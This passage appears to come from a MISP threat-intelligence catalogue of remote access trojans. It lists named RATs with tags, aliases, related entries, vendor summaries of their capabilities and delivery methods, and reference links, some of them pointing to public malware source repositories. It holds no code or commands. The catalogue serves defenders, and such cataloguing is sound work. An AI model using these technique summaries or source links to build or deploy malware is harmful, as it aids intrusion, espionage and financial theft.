UNITEDRAKE

The existence of the UNITEDRAKE RAT first came to light in 2014 as part of a series of classified documents leaked by former NSA contractor Edward Snowden.

The tag is: misp-galaxy:rat="UNITEDRAKE"

Table 8744. Table References

Links

http://thehackernews.com/2017/09/shadowbrokers-unitedrake-hacking.html

https://www.itnews.com.au/news/shadowbrokers-release-unitedrake-nsa-malware-472771

MegaTrojan

Written in Visual Basic

The tag is: misp-galaxy:rat="MegaTrojan"

Table 8745. Table References

Links

http://www.megasecurity.org/trojans/m/mega/Megatrojan1.0.html

Venomous Ivy

The tag is: misp-galaxy:rat="Venomous Ivy"

Xploit

The tag is: misp-galaxy:rat="Xploit"

Arctic R.A.T.

The tag is: misp-galaxy:rat="Arctic R.A.T."

Arctic R.A.T. is also known as:

  • Artic

Table 8746. Table References

Links

http://anti-virus-soft.com/threats/artic

GOlden Phoenix

The tag is: misp-galaxy:rat="GOlden Phoenix"

Table 8747. Table References

Links

http://www.connect-trojan.net/2014/02/golden-phoenix-rat-0.2.html

GraphicBooting

The tag is: misp-galaxy:rat="GraphicBooting"

Table 8748. Table References

Links

http://www.connect-trojan.net/2014/10/graphicbooting-rat-v0.1-beta.html?m=0

Pocket RAT

The tag is: misp-galaxy:rat="Pocket RAT"

Erebus

The tag is: misp-galaxy:rat="Erebus"

Erebus has relationships with:

  • similar: misp-galaxy:malpedia="Erebus (ELF)" with estimative-language:likelihood-probability="likely"

VorteX

The tag is: misp-galaxy:rat="VorteX"

Archelaus Beta

The tag is: misp-galaxy:rat="Archelaus Beta"

Table 8750. Table References

Links

http://www.connect-trojan.net/2014/02/archelaus-rat-beta.html

BlackHole

C# RAT (Remote Adminitration Tool) - Educational purposes only

The tag is: misp-galaxy:rat="BlackHole"

BlackHole has relationships with:

  • similar: misp-galaxy:exploit-kit="BlackHole" with estimative-language:likelihood-probability="likely"

Table 8751. Table References

Links

https://github.com/hussein-aitlahcen/BlackHole

Vanguard

The tag is: misp-galaxy:rat="Vanguard"

Table 8752. Table References

Links

http://ktwox7.blogspot.lu/2010/12/vanguard-remote-administration.html

FINSPY

Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.

The tag is: misp-galaxy:rat="FINSPY"

FINSPY has relationships with:

  • similar: misp-galaxy:tool="FINSPY" with estimative-language:likelihood-probability="likely"

Table 8754. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html

Seed RAT

Seed is a firewall bypass plus trojan, injects into default browser and has a simple purpose: to be compact (4kb server size) and useful while uploading bigger and full trojans, or even making Seed download them somewhere. Has computer info, process manager, file manager, with download, create folder, delete, execute and upload. And a remote download function. Everything with a easy to use interface, reminds an instant messenger.

The tag is: misp-galaxy:rat="Seed RAT"

Table 8755. Table References

Links

http://www.nuclearwintercrew.com/Products-View/25/Seed_1.1/

SharpBot

The tag is: misp-galaxy:rat="SharpBot"

TorCT PHP RAT

The tag is: misp-galaxy:rat="TorCT PHP RAT"

Table 8756. Table References

Links

https://github.com/alienwithin/torCT-PHP-RAT

A32s RAT

The tag is: misp-galaxy:rat="A32s RAT"

Char0n

The tag is: misp-galaxy:rat="Char0n"

Nytro

The tag is: misp-galaxy:rat="Nytro"

Syla

The tag is: misp-galaxy:rat="Syla"

Table 8757. Table References

Links

http://www.connect-trojan.net/2013/07/syla-rat-0.3.html

Cobalt Strike

Cobalt Strike is software for Adversary Simulations and Red Team Operations.

The tag is: misp-galaxy:rat="Cobalt Strike"

Cobalt Strike has relationships with:

  • similar: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="likely"

Table 8758. Table References

Links

https://www.cobaltstrike.com/

Sakula

The RAT, which according to compile timestamps first surfaced in November 2012, has been used in targeted intrusions through 2015. Sakula enables an adversary to run interactive commands as well as to download and execute additional components.

The tag is: misp-galaxy:rat="Sakula"

Sakula is also known as:

  • Sakurel

  • VIPER

Sakula has relationships with:

  • similar: misp-galaxy:mitre-malware="Sakula - S0074" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Sakula" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Sakula RAT" with estimative-language:likelihood-probability="likely"

Table 8759. Table References

Links

https://www.secureworks.com/research/sakula-malware-family

hcdLoader

hcdLoader is a remote access tool (RAT) that has been used by APT18.

The tag is: misp-galaxy:rat="hcdLoader"

hcdLoader has relationships with:

  • similar: misp-galaxy:mitre-malware="hcdLoader - S0071" with estimative-language:likelihood-probability="likely"

Table 8760. Table References

Links

https://attack.mitre.org/wiki/Software/S0071

Crimson

The tag is: misp-galaxy:rat="Crimson"

Crimson has relationships with:

  • similar: misp-galaxy:mitre-malware="Crimson - S0115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Crimson" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Crimson RAT" with estimative-language:likelihood-probability="likely"

Table 8761. Table References

Links

http://www.connect-trojan.net/2015/01/crimson-rat-3.0.0.html

KjW0rm

The tag is: misp-galaxy:rat="KjW0rm"

KjW0rm has relationships with:

  • similar: misp-galaxy:tool="KjW0rm" with estimative-language:likelihood-probability="likely"

Table 8762. Table References

Links

http://hack-defender.blogspot.fr/2015/12/kjw0rm-v05x.html

Ghost

The tag is: misp-galaxy:rat="Ghost"

Ghost is also known as:

  • Ucul

Table 8763. Table References

Links

https://www.youtube.com/watch?v=xXZW4ajVYkI

9002

The tag is: misp-galaxy:rat="9002"

Sandro RAT

The tag is: misp-galaxy:rat="Sandro RAT"

Mega

The tag is: misp-galaxy:rat="Mega"

WiRAT

The tag is: misp-galaxy:rat="WiRAT"

3PARA RAT

The tag is: misp-galaxy:rat="3PARA RAT"

3PARA RAT has relationships with:

  • similar: misp-galaxy:mitre-malware="3PARA RAT - S0066" with estimative-language:likelihood-probability="likely"

Table 8764. Table References

Links

https://books.google.fr/books?isbn=2212290136

BBS RAT

The tag is: misp-galaxy:rat="BBS RAT"

Konni

KONNI is a remote access Trojan (RAT) that was first reported in May of 2017, but is believed to have been in use for over 3 years. As Part of our daily threat monitoring, FortiGuard Labs came across a new variant of the KONNI RAT and decided to take a deeper look.

The tag is: misp-galaxy:rat="Konni"

Konni is also known as:

  • KONNI

Konni has relationships with:

  • similar: misp-galaxy:tool="KONNI" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Konni" with estimative-language:likelihood-probability="likely"

Table 8765. Table References

Links

https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant

https://www.cylance.com/en_us/blog/threat-spotlight-konni-stealthy-remote-access-trojan.html

https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/

http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html

https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

Felismus RAT

Used by Sowbug

The tag is: misp-galaxy:rat="Felismus RAT"

Table 8766. Table References

Links

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

Xsser

Xsser mRAT is a piece of malware that targets iOS devices that have software limitations removed. The app is installed via a rogue repository on Cydia, the most popular third-party application store for jailbroken iPhones. Once the malicious bundle has been installed and executed, it gains persistence - preventing the user from deleting it. The mRAT then makes server-side checks and proceeds to steal data from the user’s device and executes remote commands as directed by its command-and-control (C2) server.

The tag is: misp-galaxy:rat="Xsser"

Xsser is also known as:

  • mRAT

Table 8767. Table References

Links

https://blogs.akamai.com/2014/12/ios-and-android-os-targeted-by-man-in-the-middle-attacks.html

http://malware.wikia.com/wiki/Xsser_mRAT

GovRAT

GovRAT is an old cyberespionage tool, it has been in the wild since 2014 and it was used by various threat actors across the years.

The tag is: misp-galaxy:rat="GovRAT"

GovRAT has relationships with:

  • similar: misp-galaxy:malpedia="GovRAT" with estimative-language:likelihood-probability="likely"

Table 8768. Table References

Links

http://securityaffairs.co/wordpress/41714/cyber-crime/govrat-platform.html

http://securityaffairs.co/wordpress/51202/cyber-crime/govrat-2-0-attacks.html

Rottie3

The tag is: misp-galaxy:rat="Rottie3"

Table 8769. Table References

Links

https://www.youtube.com/watch?v=jUg5—​68Iqs

Killer RAT

The tag is: misp-galaxy:rat="Killer RAT"

Hi-Zor

The tag is: misp-galaxy:rat="Hi-Zor"

Hi-Zor has relationships with:

  • similar: misp-galaxy:mitre-malware="Hi-Zor - S0087" with estimative-language:likelihood-probability="likely"

Table 8770. Table References

Links

https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat

Quaverse

Quaverse RAT or QRAT is a fairly new Remote Access Tool (RAT) introduced in May 2015. This RAT is marketed as an undetectable Java RAT. As you might expect from a RAT, the tool is capable of grabbing passwords, key logging and browsing files on the victim’s computer. On a regular basis for the past several months, we have observed the inclusion of QRAT in a number of spam campaigns.

The tag is: misp-galaxy:rat="Quaverse"

Quaverse is also known as:

  • QRAT

Table 8771. Table References

Links

https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT—​Remote-Access-as-a-Service/

Heseber

The tag is: misp-galaxy:rat="Heseber"

Cardinal

Cardinal is a remote access trojan (RAT) discovered by Palo Alto Networks in 2017 and has been active for over two years. It is delivered via a downloader, known as Carp, and uses malicious macros in Microsoft Excel documents to compile embedded C# programming language source code into an executable that runs and deploys the Cardinal RAT. The malicious Excel files use different tactics to get the victims to execute it.

The tag is: misp-galaxy:rat="Cardinal"

Cardinal has relationships with:

  • similar: misp-galaxy:tool="EVILNUM" with estimative-language:likelihood-probability="likely"

Table 8772. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/

https://www.scmagazine.com/cardinal-rats-unique-downloader-allowed-it-to-avoid-detection-for-years/article/651927/

https://www.cyber.nj.gov/threat-profiles/trojan-variants/cardinal

https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/

OmniRAT

Works on all Android, Windows, Linux and Mac devices!

The tag is: misp-galaxy:rat="OmniRAT"

OmniRAT has relationships with:

  • similar: misp-galaxy:malpedia="OmniRAT" with estimative-language:likelihood-probability="likely"

Table 8773. Table References

Links

https://omnirat.eu/en/

Jfect

The tag is: misp-galaxy:rat="Jfect"

Table 8774. Table References

Links

https://www.youtube.com/watch?v=qKdoExQFb68

Trochilus

Trochilus is a remote access trojan (RAT) first identified in October 2015 when attackers used it to infect visitors of a Myanmar website. It was then used in a 2016 cyber-espionage campaign, dubbed "the Seven Pointed Dagger," managed by another group, "Group 27," who also uses the PlugX trojan. Trochilus is primarily spread via emails with a malicious .RAR attachment containing the malware. The trojan’s functionality includes a shellcode extension, remote uninstall, a file manager, and the ability to download and execute, upload and execute, and access the system information. Once present on a system, Trochilus can move laterally in the network for better access. This trojan operates in memory only and does not write to the disk, helping it evade detection.

The tag is: misp-galaxy:rat="Trochilus"

Trochilus has relationships with:

  • similar: misp-galaxy:tool="Trochilus" with estimative-language:likelihood-probability="likely"

Table 8775. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

http://securityaffairs.co/wordpress/43889/cyber-crime/new-rat-trochilus.html

Matryoshka

Their most commonly used initial attack vector is a simple, yet alarmingly effective, spearphishing attack, infecting unsuspecting victims via a malicious email attachment (usually an executable that has been disguised as something else). From there, Matryoshka runs second stage malware via a dropper and covertly installs a Remote Access Toolkit (RAT). This is done using a reflective loader technique that allows the malware to run in process memory, rather than being written to disk. This not only hides the install of the RAT but also ensures that the RAT will be ‘reinstalled’ after system restart.

The tag is: misp-galaxy:rat="Matryoshka"

Matryoshka has relationships with:

  • similar: misp-galaxy:tool="Matryoshka" with estimative-language:likelihood-probability="likely"

Table 8776. Table References

Links

https://www.alienvault.com/blogs/security-essentials/matryoshka-malware-from-copykittens-group

Mangit

First discovered by Trend Micro in June, Mangit is a new malware family being marketed on both the Dark web and open internet. Users have the option to rent the trojan’s infrastructure for about $600 per 10-day period or buy the source code for about $8,800. Mangit was allegedly developed by "Ric", a Brazilian hacker, who makes himself available via Skype to discuss rental agreements. Once the malware is rented or purchased, the user controls a portion of the Mangit botnet, the trojan, the dropper, an auto-update system, and the server infrastructure to run their attacks. Mangit contains support for nine Brazillian banks including Citibank, HSBC, and Santander. The malware can also be used to steal user PayPal credentials. Mangit has the capability to collect banking credentials, receive SMS texts when a victim is accessing their bank account, and take over victim’s browsers. To circumvent two-factor authentication, attackers can use Mangit to lock victim’s browsers and push pop-ups to the victim asking for the verification code they just received.

The tag is: misp-galaxy:rat="Mangit"

Table 8777. Table References

Links

http://virusguides.com/newly-discovered-mangit-malware-offers-banking-trojan-service/

https://www.cyber.nj.gov/threat-profiles/trojan-variants/mangit

http://news.softpedia.com/news/new-malware-mangit-surfaces-as-banking-trojan-as-a-service-505458.shtml

Revenge-RAT

Revenge v0.1 was a simple tool, according to a researcher known as Rui, who says the malware’s author didn’t bother obfuscating the RAT’s source code. This raised a question mark with the researchers, who couldn’t explain why VirusTotal scanners couldn’t pick it up as a threat right away.Revenge, which was written in Visual Basic, also didn’t feature too many working features, compared to similar RATs. Even Napolean admitted that his tool was still in the early development stages, a reason why he provided the RAT for free.

The tag is: misp-galaxy:rat="Revenge-RAT"

Table 8779. Table References

Links

http://www.securitynewspaper.com/2016/08/31/unsophisticated-revenge-rat-released-online-free-exclusive/

vjw0rm 0.1

“Vengeance Justice Worm” was first discovered in 2016 and is a highly multifunctional, modular, publicly available “commodity malware”, i.e., it can be purchased by those interested through various cybercrime and hacking related forums and channels.

VJwOrm is a JavaScript-based malware and combines characteristics of Worm, Information Stealer, Remote-Access Trojan (RAT), Denial-of-Service (DOS) malware, and spam-bot.

VJw0rm is propagated primarily by malicious email attachments and by infecting removeable storage devices.

Once executed by the victim, the very heavily obfuscated VJw0rm will enumerate installed drives and, if a removeable drive is found, VJwOrm will infect it if configured to do so.

It will continue to gather victim information such as operating system details, user’s details, installed anti-virus product details, stored browser cookies, the presence of vbc.exe on the system (Microsoft’s .NET Visual Basic Compiler, this indicates that .NET is installed on the system and can affect the actor’s choice of additional malware delivery), and whether the system has been previously infected.

VJw0rm will then report this information back to its command-and-control server and await further commands, such as downloading and executing additional malware or employing any of its other numerous capabilities.

Finally, VJw0rm establishes persistency in the form of registry auto-runs, system startup folders, a scheduled-task, or any combination of these methods.

The tag is: misp-galaxy:rat="vjw0rm 0.1"

vjw0rm 0.1 is also known as:

  • Vengeance Justice Worm

  • VJw0rm

  • VJwOrm

Table 8780. Table References

Links

https://twitter.com/malwrhunterteam/status/816993165119016960?lang=en

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

rokrat

ROKRAT is a remote access trojan (RAT) that leverages a malicious Hangual Word Processor (HWP) document sent in spearphishing emails to infect hosts. The HWP document contains an embedded Encapsulated PostScript (EPS) object. The object exploits an EPS buffer overflow vulnerability and downloads a binary disguised as a .JPG file. The file is then decoded and the ROKRAT executable is initiated. The trojan uses legitimate Twitter, Yandex, and Mediafire websites for its command and control communications and exfiltration platforms, making them difficult to block globally. Additionally, the platforms use HTTPS connections, making it more difficult to gather additional data on its activities. Cisco’s Talos Group identified two email campaigns. In one, attackers send potential victims emails from an email server of a private university in Seoul, South Korea with a sender email address of "kgf2016@yonsei.ac.kr," the contact email for the Korea Global Forum, adding a sense of legitimacy to the email. It is likely that the email address was compromised and used by the attackers in this campaign. The second is less sophisticated and sends emails claiming to be from a free Korean mail service with a the subject line, "Request Help" and attached malicious HWP filename, "I’m a munchon person in Gangwon-do, North Korea." The ROKRAT developer uses several techniques to hinder analysis, including identifying tools usually used by malware analysts or within sandbox environments. Once it has infected a device, this trojan can execute commands, move a file, remove a file, kill a process, download and execute a file, upload documents, capture screenshots, and log keystrokes. Researchers believe the developer is a native Korean speaker and the campaign is currently targeting Korean-speakers.

The tag is: misp-galaxy:rat="rokrat"

rokrat is also known as:

  • ROKRAT

Table 8781. Table References

Links

http://blog.talosintelligence.com/2017/04/introducing-rokrat.html

http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

Qarallax

Travelers applying for a US Visa in Switzerland were recently targeted by cyber-criminals linked to a malware called QRAT. Twitter user @hkashfi posted a Tweet saying that one of his friends received a file (US Travel Docs Information.jar) from someone posing as USTRAVELDOCS.COM support personnel using the Skype account ustravelidocs-switzerland (notice the “i” between “travel” and “docs”).

The tag is: misp-galaxy:rat="Qarallax"

Qarallax is also known as:

  • qrat

Qarallax has relationships with:

  • similar: misp-galaxy:tool="qrat" with estimative-language:likelihood-probability="likely"

Table 8782. Table References

Links

https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/

MoonWind

MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand.

The tag is: misp-galaxy:rat="MoonWind"

MoonWind has relationships with:

  • similar: misp-galaxy:mitre-malware="MoonWind - S0149" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="MoonWind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="MoonWind" with estimative-language:likelihood-probability="likely"

Table 8783. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

https://attack.mitre.org/wiki/Software/S0149

Remcos

Remcos is another RAT (Remote Administration Tool) that was first discovered being sold in hacking forums in the second half of 2016. Since then, it has been updated with more features, and just recently, we’ve seen its payload being distributed in the wild for the first time.

The tag is: misp-galaxy:rat="Remcos"

Remcos has relationships with:

  • similar: misp-galaxy:malpedia="Remcos" with estimative-language:likelihood-probability="likely"

Table 8784. Table References

Links

https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2

https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html

Client Maximus

The purpose of the Client Maximus malware is financial fraud. As such, its code aspires to create the capabilities that most banking Trojans have, which allow attackers to monitor victims’ web navigation and interrupt online banking session at will. After taking over a victim’s banking session, an attacker operating this malware can initiate a fraudulent transaction from the account and use social engineering screens to manipulate the unwitting victim into authorizing it.

The tag is: misp-galaxy:rat="Client Maximus"

Client Maximus has relationships with:

  • similar: misp-galaxy:malpedia="Client Maximus" with estimative-language:likelihood-probability="likely"

Table 8785. Table References

Links

https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/

TheFat RAT

Thefatrat a massive exploiting tool revealed >> An easy tool to generate backdoor and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most…

The tag is: misp-galaxy:rat="TheFat RAT"

Table 8786. Table References

Links

https://github.com/Screetsec/TheFatRat

RedLeaves

Since around October 2016, JPCERT/CC has been confirming information leakage and other damages caused by malware ‘RedLeaves’. It is a new type of malware which has been observed since 2016 in attachments to targeted emails.

The tag is: misp-galaxy:rat="RedLeaves"

RedLeaves has relationships with:

  • similar: misp-galaxy:mitre-malware="RedLeaves - S0153" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="BUGJUICE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="RedLeaves" with estimative-language:likelihood-probability="likely"

Table 8787. Table References

Links

http://blog.jpcert.or.jp/2017/04/redleaves---malware-based-on-open-source-rat.html

Rurktar

Dubbed Rurktar, the tool hasn’t had all of its functionality implemented yet, but G DATA says “it is relatively safe to say [it] is intended for use in targeted spying operations.” The malicious program could be used for reconnaissance operations, as well as to spy on infected computers users, and steal or upload files.

The tag is: misp-galaxy:rat="Rurktar"

Rurktar has relationships with:

  • similar: misp-galaxy:malpedia="Rurktar" with estimative-language:likelihood-probability="likely"

Table 8788. Table References

Links

http://www.securityweek.com/rurktar-malware-espionage-tool-development

RATAttack

RATAttack is a remote access trojan (RAT) that uses the Telegram protocol to support encrypted communication between the victim’s machine and the attacker. The Telegram protocol also provides a simple method to communicate to the target, negating the need for port forwarding. Before using RATAttack, the attacker must create a Telegram bot and embed the bot’s Telegram token into the trojan’s configuration file. When a system is infected with RATAttack, it connects to the bot’s Telegram channel. The attacker can then connect to the same channel and manage the RATAttack clients on the infected host machines. The trojan’s code was available on GitHub then was taken down by the author on April 19, 2017.

The tag is: misp-galaxy:rat="RATAttack"

Table 8789. Table References

Links

https://www.cyber.nj.gov/threat-profiles/trojan-variants/ratattack

KhRAT

So called because the Command and Control (C2) infrastructure from previous variants of the malware was located in Cambodia, as discussed by Roland Dela Paz at Forecpoint here, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.

The tag is: misp-galaxy:rat="KhRAT"

Table 8790. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/

RevCode

The tag is: misp-galaxy:rat="RevCode"

Table 8791. Table References

Links

https://revcode.eu/

AhNyth Android

Android Remote Administration Tool

The tag is: misp-galaxy:rat="AhNyth Android"

Table 8792. Table References

Links

https://github.com/AhMyth/AhMyth-Android-RAT

Socket23

SOCKET23 was launched from his web site and immedi- ately infected major French corporations between August and October 1998. The virus (distributing the Trojan) was known as W32/HLLP.DeTroie.A (alias W32/Cheval.TCV). Never had a virus so disrupted French industry. The author quickly offered his own remover and made his apologies on his web site (now suppressed). Jean-Christophe X (18) was arrested on Tuesday 15 June 1999 in the Paris area and placed under judicial investigation for ‘fraudulent intrusion of data in a data processing system, suppression and fraudulent modification of data’

The tag is: misp-galaxy:rat="Socket23"

Table 8793. Table References

Links

https://www.virusbulletin.com/uploads/pdf/magazine/1999/199908.pdf

PowerRAT

The tag is: misp-galaxy:rat="PowerRAT"

MacSpy

Standard macOS backdoor, offered via a 'malware-as-a-service' model. MacSpy is advertised as the "most sophisticated Mac spyware ever", with the low starting price of free. While the idea of malware-as-a-service (MaaS) isn’t a new one with players such as Tox and Shark the game, it can be said that MacSpy is one of the first seen for the OS X platform.

The tag is: misp-galaxy:rat="MacSpy"

MacSpy has relationships with:

  • similar: misp-galaxy:malpedia="MacSpy" with estimative-language:likelihood-probability="likely"

Table 8794. Table References

Links

https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service

https://objective-see.com/blog/blog_0x25.html

DNSMessenger

Talos recently analyzed an interesting malware sample that made use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker. This is an extremely uncommon and evasive way of administering a RAT. The use of multiple stages of Powershell with various stages being completely fileless indicates an attacker who has taken significant measures to avoid detection.

The tag is: misp-galaxy:rat="DNSMessenger"

DNSMessenger has relationships with:

  • similar: misp-galaxy:mitre-malware="TEXTMATE - S0146" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="POWERSOURCE - S0145" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"

Table 8795. Table References

Links

http://blog.talosintelligence.com/2017/03/dnsmessenger.html

PentagonRAT

The tag is: misp-galaxy:rat="PentagonRAT"

Table 8796. Table References

Links

http://pentagon-rat.blogspot.fr/

NewCore

NewCore is a remote access trojan first discovered by Fortinet researchers while conducting analysis on a China-linked APT campaign targeting Vietnamese organizations. The trojan is a DLL file, executed after a trojan downloader is installed on the targeted machine. Based on strings in the code, the trojan may be compiled from the publicly-available source code of the PcClient and PcCortr backdoor trojans.

The tag is: misp-galaxy:rat="NewCore"

Table 8797. Table References

Links

https://www.cyber.nj.gov/threat-profiles/trojan-variants/newcore

https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations

Deeper RAT

The tag is: misp-galaxy:rat="Deeper RAT"

Xyligan

The tag is: misp-galaxy:rat="Xyligan"

H-w0rm

The tag is: misp-galaxy:rat="H-w0rm"

htpRAT

On November 8, 2016 a non-disclosed entity in Laos was spear-phished by a group closely related to known Chinese adversaries and most likely affiliated with the Chinese government. The attackers utilized a new kind of Remote Access Trojan (RAT) that has not been previously observed or reported. The new RAT extends the capabilities of traditional RATs by providing complete remote execution of custom commands and programming. htpRAT, uncovered by RiskIQ cyber investigators, is the newest weapon in the Chinese adversary’s arsenal in a campaign against Association of Southeast Asian Nations (ASEAN). Most RATs can log keystrokes, take screenshots, record audio and video from a webcam or microphone, install and uninstall programs and manage files. They support a fixed set of commands operators can execute using different command IDs —’file download’ or ‘file upload,’ for example—and must be completely rebuilt to have different functionality. htpRAT, on the other hand, serves as a conduit for operators to do their job with greater precision and effect. On the Command and Control (C2) server side, threat actors can build new functionality in commands, which can be sent to the malware to execute. This capability makes htpRAT a small, agile, and incredibly dynamic piece of malware. Operators can change functionality, such as searching for a different file on the victim’s network, simply by wrapping commands.

The tag is: misp-galaxy:rat="htpRAT"

htpRAT has relationships with:

  • similar: misp-galaxy:malpedia="htpRAT" with estimative-language:likelihood-probability="likely"

Table 8798. Table References

Links

https://cdn.riskiq.com/wp-content/uploads/2017/10/RiskIQ-htpRAT-Malware-Attacks.pdf?_ga=2.159415805.1155855406.1509033001-1017609577.1507615928

FALLCHILL

According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors. HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware-as-a-service to establish persistence. Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.

The tag is: misp-galaxy:rat="FALLCHILL"

FALLCHILL has relationships with:

  • similar: misp-galaxy:mitre-malware="FALLCHILL - S0181" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Volgmer" with estimative-language:likelihood-probability="likely"

Table 8799. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-318A

https://securelist.com/operation-applejeus/87553/

UBoatRAT

Alto Networks Unit 42 has identified attacks with a new custom Remote Access Trojan (RAT) called UBoatRAT. The initial version of the RAT, found in May of 2017, was simple HTTP backdoor that uses a public blog service in Hong Kong and a compromised web server in Japan for command and control. The developer soon added various new features to the code and released an updated version in June. The attacks with the latest variants we found in September have following characteristics. Targets personnel or organizations related to South Korea or video games industry Distributes malware through Google Drive Obtains C2 address from GitHub Uses Microsoft Windows Background Intelligent Transfer Service(BITS) to maintain persistence.

The tag is: misp-galaxy:rat="UBoatRAT"

Table 8800. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/

CrossRat

The EFF/Lookout report describes CrossRat as a “newly discovered desktop surveillanceware tool…which is able to target Windows, OSX, and Linux.”

The tag is: misp-galaxy:rat="CrossRat"

Table 8801. Table References

Links

https://digitasecurity.com/blog/2018/01/23/crossrat/

TSCookieRAT

TSCookie provides parameters such as C&C server information when loading TSCookieRAT. Upon the execution, information of the infected host is sent with HTTP POST request to an external server. (The HTTP header format is the same as TSCookie.) The data is RC4-encrypted from the beginning to 0x14 (the key is Date header value), which is followed by the information of the infected host (host name, user name, OS version, etc.). Please refer to Appendix C, Table C-1 for the data format.

The tag is: misp-galaxy:rat="TSCookieRAT"

Table 8802. Table References

Links

http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html

Coldroot

Coldroot, a remote access trojan (RAT), is still undetectable by most antivirus engines, despite being uploaded and freely available on GitHub for almost two years. The RAT appears to have been created as a joke, "to Play with Mac users," and "give Mac it’s rights in this [the RAT] field," but has since expanded to work all three major desktop operating systems — Linux, macOS, and Windows— according to a screenshot of its builder extracted from a promotional YouTube video.

The tag is: misp-galaxy:rat="Coldroot"

Table 8803. Table References

Links

https://www.bleepingcomputer.com/news/security/coldroot-rat-still-undetectable-despite-being-uploaded-on-github-two-years-ago/

https://github.com/xlinshan/Coldroot

Comnie

Comnie is a RAT originally identified by Sophos. It has been using Github, Tumbler and Blogspot as covert channels for its C2 communications. Comnie has been observed targetting government, defense, aerospace, high-tech and telecommunication sectors in Asia.

The tag is: misp-galaxy:rat="Comnie"

Table 8804. Table References

Links

https://exchange.xforce.ibmcloud.com/collection/East-Asia-Organizations-Victims-of-Comnie-Attack-12749a9dbc20e2f40b3ae99c43416d8c

https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/

GravityRAT

GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We’ve seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT. This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor.

The tag is: misp-galaxy:rat="GravityRAT"

Table 8805. Table References

Links

https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html

ARS VBS Loader

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim’s machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious "loaders".

The tag is: misp-galaxy:rat="ARS VBS Loader"

ARS VBS Loader has relationships with:

  • similar: misp-galaxy:malpedia="ARS VBS Loader" with estimative-language:likelihood-probability="likely"

Table 8806. Table References

Links

https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/

RadRAT

